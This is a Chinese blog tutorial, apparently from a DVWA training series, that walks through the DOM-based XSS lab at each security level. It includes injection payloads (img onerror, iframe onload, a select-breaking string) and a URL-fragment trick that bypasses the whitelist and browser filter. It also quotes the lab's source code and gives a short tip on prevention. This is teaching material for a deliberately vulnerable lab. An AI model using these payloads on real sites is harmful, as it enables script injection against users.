【工具-DVWA】DVWA渗透系列十:XSS(DOM)

最新推荐文章于 2024-07-03 09:32:31 发布
最新推荐文章于 2024-07-03 09:32:31 发布
阅读量1.9k 收藏 17
点赞数 3
分类专栏: # 工具 文章标签: DVWA XSS DOM
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qqchaozai/article/details/102753847
版权

前言

DVWA安装使用介绍,见:【工具-DVWA】DVWA的安装和使用

本渗透系列包含最新DVWA的14个渗透测试样例:

1.Brute Force(暴力破解)                    
2.Command Injection(命令注入)
3.CSRF(跨站请求伪造)                        
4.File Inclusion(文件包含)
5.File Upload(文件上传)                    
6.Insecure CAPTCHA(不安全的验证码)
7.SQL Injection(SQL注入)                    
8.SQL Injection(Blind)(SQL盲注)
9.Weak Session IDs(有问题的会话ID)                
10.XSS(DOM)(DOM型xss)
11.XSS(ref)(反射型xss)                    
12.XSS(Stored)(存储型xss)
13.CSP Bypass(Content Security Policy内容安全策略,旁路/绕过)    
14.JavaScript​​​​​​​

安全级别分低、中、高、安全四个级别来分析XSS(DOM)的渗透测试过程。

1 基础知识

  • XSS

Cross Site Scripting,一种将恶意代码注入到页面的攻击手段,当用户访问页面时,恶意代码会被执行。

  • DOM

文档对象模型(Document Object Model),是W3C组织推荐的处理可扩展置标语言的标准编程接口。也就是一种可以被页面解释执行的代码。

  • 常用注入代码
<script>alert(1)</script>
<img src=1 onerror=alert(1) hidden="true"/>
<iframe onload=alert(1) height="0" width="0" hidden="true"/>

2 Low

2.1 渗透测试

  • 采用最简单的alert测试:结果浏览器自动拦截了DOM式的XSS请求。

  • 查看源代码:猜测可能是decodeURI函数被监控,无法被利用,那么改为渗透<option>

  • 二次渗透:option+script,不行,所以采用option+iframe或img,都可以成功!</select>是为了破坏选择框的结构。
</select><img src=1  onerror=alert(1)>
</select><iframe onload=alert(1) height="0" width="0" hidden="true"/>

PS:为何是用IE,因为最新版谷歌,怎么都没绕过去......

  • 好的,过了五分钟,居然发现绕过谷歌的方法:
English#</select><img%20src=1%20onerror=alert(1)>

【#】号后面的内容是不会提交到后台,那么浏览器就觉得,小子,你是安全的,嘿嘿嘿!

2.2 源码分析

发现:nothing!够直接

# No protections, anything goes

3 Medium+High

3.1 渗透测试

  • Medium

发现:之前的渗透方式都可行,那就等会看看源码加了啥防护

</select><img src=1  onerror=alert(1)>
</select><iframe onload=alert(1) height="0" width="0" hidden="true"/>

  • High

采用【#】截断绕过,顺便破了谷歌不能绕过DOM的问题。

English#</select><img%20src=1%20onerror=alert(1)>

3.2 源码分析

  • Medium:限制了不能有【<script】
if (stripos ($default, "<script") !== false) {
  • High:采用了白名单,采用【#】可以绕过后台效验,同时前端依旧安装原本请求的URL去获取数据。
# White list the allowable languages
switch ($_GET['default']) {
	case "French":
	case "English":
	case "German":
	case "Spanish":
		# ok
		break;
	default:
		header ("location: ?default=English");
		exit;
}
前端:
var lang = document.location.href.substring(document.location.href.indexOf("default=")+8);

4 Impossible

源码分析:后台什么也不做,前端去除了URI解码的函数,默认不解码,所以无法被前端执行。

# Don't need to do anything, protction handled on the client side
前端:
$decodeURI = "decodeURI";
if ($vulnerabilityFile == 'impossible.php') {
	$decodeURI = "";
}

5 总结

利用:任何URL带参页面,都可以尝试渗透

预防:在页面跳转时,不要过分依赖URL数据,尽量通过POST重新获取数据

 

 

爱家人,爱生活,爱设计,爱编程,拥抱精彩人生!

qqchaozai
关注
专栏目录
DVWA--XSS(DOM)
weixin_45038413的博客
05-09 534
Javascript弹窗函数 Low 等级 Medium 等级 过滤了<script stripos() 函数查找字符串在另一字符串中第一次出现的位置(不区分大小写) 使用img标签发现没有弹窗 查看网页源码,发现语句被插入到了value值中,并没有插入到option标签的值中,所以img标签并没有发起任何作用。 构造语句闭合option标签: default=></o...
玩转DVWAXSS DOM
key01362000的博客
09-29 1075
DVWAXSS DOM攻击
DVWA-XSS(DOM)
weixin_44866139的博客
01-29 2783
XSS 简介 参考链接 XSS(Cross Site Script),全称跨站脚本攻击,为了与 CSS(Cascading Style Sheet) 有所区别,所以在安全领域称为 XSSXSS 攻击,通常指黑客通过 HTML 注入 篡改网页,插入恶意脚本,从而在用户浏览网页时,控制用户浏览器的一种攻击行为。 DOM—based XSS漏洞的产生 DOM—based XSS漏洞是基于文档对象模...
【网络安全渗透测试零基础入门必知必会】之如何搭建 DVWA 靶场保姆级教程(非常详细)零基础入门到精通,收藏这一篇就够了4
最新发布
Libra1313的博客
07-03 2230
DVWA代表Damn Vulnerable Web Application,是一个用于学习和练习Web应用程序漏洞的开源漏洞应用程序。它被设计成一个易于安装和配置的漏洞应用程序,旨在帮助安全专业人员和爱好者了解和熟悉不同类的Web应用程序漏洞。DVWA提供了一系列的漏洞场景和练习环境,用户可以通过攻击这些漏洞场景来学习和实践漏洞利用技术。这些漏洞包括常见的安全问题,如SQL注入、跨站脚本攻击(XSS)、文件包含漏洞等。通过攻击这些漏洞,用户可以了解漏洞的原理、影响和防御方法。
DVWA-11-XSS(Dom)
dahe
03-06 179
目录 1.概念 2.实验 2.1 LOW 2.2 Medium 2.3 high 2.4 impossible 1.概念 DOMXSS DOM全程Document Object Model,使用DOM可以使程序和脚本能够动态访问和更新文档的内容、结构和样式。 DOMXSS其实是一种特殊类的反射XSS,它是基于DOM文档对象模的一种漏洞。 HTML的标签都是节点,而这些节点组成了DOM的整体结构-节点树。通过HTML DOM,树中所有节点均可通过JavaScript进.
DVWAXSSDOM
RexHa的博客
10-06 2082
dvwa XSSDOM
[网络安全]DVWAXSS(DOM)攻击姿势及解题详析合集
热门推荐
等风来
05-16 1万+
源代码未进行任何过滤复选框中的内容为可变参数:这段 PHP 代码主要是用于处理 GET 请求中的 default 参数,它包含了以下几个功能: 1.判断是否有 default 参数:通过 array_key_exists() 函数来判断 $_GET 超级全局变量中是否存在名为 default 的键,如果存在并且不为 null,则将其赋值给 $default 变量。 2.防止 XSS 攻击:使用 stripos() 函数查找 $default 中是否包含
DVWA关卡10:DOM Based Cross Site Scripting (XSS)(DOMXSS
m0_54899775的博客
12-08 1223
DVWA关卡10:DOM Based Cross Site Scripting (XSS)(DOMXSS
2019-3-2 dvwa学习(5)--DOMXSS攻击
weixin_42555985的博客
03-02 1534
什么是XSS攻击? XSS,Cross-site Scripting ,跨站脚本攻击,是一种注入攻击, 它会把恶意脚本(malicious scripts) 注入其他网站中。当攻击者使用Web应用程序向不同的最终用户发送恶意脚本(通常以浏览器脚本的形式)时,就会发生XSS攻击。 能让这些攻击成功的缺陷非常普遍,例如:Web应用程序在其生成的输出中使用了用户输入,同时又不做验证(validatin...
2020-12-07-DVWAXSS
qq_50963064的博客
01-24 198
layout: post title: DVWAXSS subtitle: 学习学习 date: 2020-12-08 author: lll-yz header-img: img/post-bg-coffee.jpg catalog: true tags: DVWA DVWAXSS详解 XSS概念:通常指黑客通过HTML注入纂改了网页,插入恶意脚本,从而在用户浏览网页时,控制用户浏览器的一种攻击。 XSS三种: 反射xss:只是简单地把用户输入的数据反射.
代码审计——DVWA DOM Based Cross Site Scripting (XSS) DOMXSS
z1756227332的博客
03-13 1165
关于三种XSS的流程 DOM 代码 -> 浏览器(js) 反射性 代码 -> 浏览器 ->php -> 浏览器 存储性 代码->浏览器->PHP->数据库->php->浏览器 Low等级代码 <?php 这个意思就是没有过滤 输入什么就会输出什么。 # No protections, anything goes 没有保护,什么都...
DVWA 通关XSS (DOM)
干铮的博客
08-01 1993
DomXSS DomXSS是一种XSS攻击,其中攻击的代码是由于受害者浏览器页面的DOM树而执行的特殊的地方就是代码攻击(payload) 在浏览器本地修改Dom树而执行,并不会将payload上传到服务器,这也使得DOMXSS比较难以检测 Low 简单难度没有参数过滤,直接修改下拉框上传参数的值 default=<script>alert(/xss/)</script> Medium 过滤了<script>标签 闭合</option&gt
DVWAXSSDOM
ANDTM的博客
06-08 319
DOM就是一个树状的模,你可以编写Javascript代码根据dom一层一层的节点,去遍历/获取/修改对应的节点,对象,值。了解了这么一个知识点,你就会发现,其实dom xss并不复杂,他也属于反射xss的一种(domxss取决于输出位置,并不取决于输出环境,因此domxss既有可能是反射的,也有可能是存储的),简单去理解就是因为他输出点在DOMdom - xss是通过url传入参数去控制触发的)
DVWA--XSS (DOM)
When you collect everything, you understand nothing.
09-09 391
0x00简介 DOM XSS漏洞是基于文档对象模(Document Object Model,DOM)的一种漏洞。DOM是一个与平台、编程语言无关的接口,它允许程序或脚本动态地访问和更新文档内容、结构和样式,处理后的结果能够成为显示页面的一部分。 DOM中有很多对象,其中一些是用户可以操纵的,如url、location、refere等。客户端的脚本程序可以通过DOM动态地检查和修改页面内容,它不...
DVWA XSS DOM
m0_56107268的博客
04-30 1028
DOM,全称Document Object Model,是一个平台和语言都中立的接口,可以使程序和脚本能够动态访问和更新文档的内容、结构以及样式。 DOMXSS其实是一种特殊类的反射XSS,它是基于DOM文档对象模的一种漏洞。 在网站页面中有许多页面的元素,当页面到达浏览器时浏览器会为页面创建一个顶级的Document object文档对象,接着生成各个子文档对象,每个页面元素对应一个文档对象,每个文档对象包含属性、方法和事件。可以通过JS脚本对文档对象进行编辑从而修改页面的元素。也就是说,..
DVWA XSS(DOM树)
qq_43452198的博客
04-23 530
XSS DOMlowmediumhighimpossible XSS(Cross Site Script),全称跨站脚本攻击,为了与 CSS(Cascading Style Sheet) 有所区别,所以在安全领域称为 XSSXSS 攻击,通常指黑客通过 HTML 注入 篡改网页,插入恶意脚本,从而在用户浏览网页时,控制用户浏览器的一种攻击行为。 DOMXSS由于其特殊性,常常被分为第三种,这...
DVWA系列——XSS(跨站脚本注入(反射,储存DOM))
weixin_49340699的博客
12-15 2424
DVWA系列——XSS(跨站脚本注入)简介low级别反射xss源码分析储存xss源码分析DOMxss源码分析medium级别反射xss源码分析破解思路储存xssDOMxss源码分析high级别反射xss储存xssDOMxss 简介 XSS全称Cross Site Scripting,即跨站脚本攻击,从某种意义上来说也是一种注入攻击,是指攻击者在页面中注入恶意的脚本代码,当受害者访问该页面,恶意代码就会在浏览器页面执行,xss不限于javascript,还包括flash等其他脚本语言,根据代
DVWADOMXSS
qq_39682037的博客
03-19 2415
DOMXSS 是一种特殊类的反射XSS,它是基于DOM文档对象模的一种漏洞,其触发不需要经过服务器端,也就是说,服务端的防御并不起作用。 Security Level: low 源码 <?php # No protections, anything goes ?> 分析 什么限制都没有,大胆尝试 进行下方的实验 发现在url的default写什么页面便生成什...
一、详解 DVWA_DOMXSS
在下小黄的博客
05-22 1650
第一篇,DVWA_DOMXSS详解
DVWA平台安全测试实战:XSS漏洞详解与练习
本资源是一份针对DVWA平台进行安全测试练习的详细指南,主要关注XSS(跨站脚本攻击)漏洞的检测和利用方法,旨在帮助初学者理解和实践网络安全技能。文档首先介绍了如何通过Cookie盗取并利用,然后分别对三种类的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

qqchaozai

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值